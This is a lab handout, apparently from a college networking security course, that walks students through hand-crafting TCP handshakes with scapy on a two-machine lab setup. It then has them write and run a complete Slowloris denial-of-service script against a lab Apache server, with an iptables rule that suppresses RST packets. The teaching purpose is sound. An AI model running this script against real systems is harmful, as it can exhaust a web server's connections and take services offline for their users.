On the Target Linux machine, in the Terminal window, execute the ifconfig command. Make a note of your IP address for later reference.
On the Target Linux machine, in the Terminal window, execute this command:
service apache2 restart
watch "netstat -pant"
You should see a continuously updated list of network connections,
as shown below on this page. Right now, there are no
ESTABLISHED connections, only a listening process.
On your Target Linux machine, you should see an ESTABLISHED connection to the server on local port 80, as shown below on this page. If you don't see it, try refreshing the browser on the Attacker Linux machine.
On the Attacker Linux Machine, open a Terminal window. In the Terminal window, execute this command:
iptables -L
If you see a rule in the OUTPUT section that drops RST packets,
as shown below on this page, your firewall is correctly
configured. If the rule is not there, execute this command
to add it:
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP
cd
nano handshake.py
In the nano window, type (or copy and paste) this script:
#!/usr/bin/env python
import sys
from scapy.all import *
if len(sys.argv) != 3:
print "Usage: ./handshake.py <target-ip> <source-port>"
sys.exit(1)
target = sys.argv[1]
sp = int(sys.argv[2])
i = IP()
i.dst = target
print "IP layer prepared: ", i.summary()
t = TCP()
t.dport = 80
t.sport = sp
t.flags = "S"
print "Sending TCP SYN Packet: ", t.summary()
ans = sr1(i/t)
print "Reply was: ",ans.summary()
t.seq = ans.ack
t.ack = ans.seq + 1
t.flags = "A"
print "Sending TCP ACK Packet: ", t.summary()
ans = sr(i/t/"X")
Here is an image of the script:
Save the file with Ctrl+X, Y, Enter.
On the Attacker Linux machine, in the Terminal window, execute these commands. In the second command, replace the IP address with the address of your Linux Target machine:
chmod a+x handshake.py
./handshake.py 192.168.198.133 2000
On the Target Linux machine, you should see a connection from local port 80
to remote port 2000 appear. At first, it is in the ESTABLISHED state, but it
rapidly changes to a FIN-WAIT state, as shown below on this page. Capture a screen
image before the connection vanishes. If it vanishes before you can get the image,
just repeat the ./handshake.py 192.168.198.133 2000 command again.
Make sure you can see the ESTABLISHED or FIN-WAIT connection, from local port 80 to remote port 2000.
Save a screen image with the filename Proj X12a from Your Name.
firefox localhost/server-status
You should see the Apache server status page,
with only one request being processed,
as shown below on this page:
nano slowloris.py
In the nano window, type (or copy and paste) this script.
Replace YOUR NAME with your own name.
#!/usr/bin/env python
import sys
from scapy.all import *
if len(sys.argv) != 4:
print "Usage: ./slowloris.py <target-ip> <starting-source-port> <number-of-GETs>"
sys.exit(1)
target = sys.argv[1]
sp = int(sys.argv[2])
numgets = int(sys.argv[3])
print "Welcome to YOUR NAME's Slow Loris Attack with scapy!"
print "Attacking ", target, " with ", numgets, " GETs"
i = IP()
i.dst = target
print "IP layer prepared: ", i.summary()
for s in range(sp, sp+numgets-1):
t = TCP()
t.dport = 80
t.sport = s
t.flags = "S"
ans = sr1(i/t, verbose=0)
t.seq = ans.ack
t.ack = ans.seq + 1
t.flags = "A"
get = "GET / HTTP/1.1\r\nHost: " + target
ans = sr1(i/t/get, verbose=0)
print "Port ", s, " attacked!"
print "Done!"
The script looks like this (split across two images):
This script is very similar to the handshake.py script. The only changes are that it sends an HTTP GET each time, which is incomplete because it is missing the final carriage return and line feed, and that it loops through many source ports.
On the Attacker Linux machine, in the Terminal window, execute these commands. In the second command, replace the IP address with the address of your Linux Target machine:
chmod a+x slowloris.py
./slowloris.py 192.168.198.133 3000 1000
On the Target Linux machine, in the Firefox window,
click the Refresh button every few seconds.
The grid should be filling with letters,
as the attack uses up all available connections.
Your screen should look like the image below on this page:
Make sure you can see the grid, showing at least 10 letters.
Save a screen image with the filename Proj X12b from Your Name.
Email the images to cnit.123@gmail.com with a Subject line of Proj X12 from Your Name.
http://wikihead.wordpress.com/2011/01/09/packet-crafting-using-scapy/
http://blog.facilelogin.com/2010/12/hand-crafting-tcp-handshake-with-scapy.html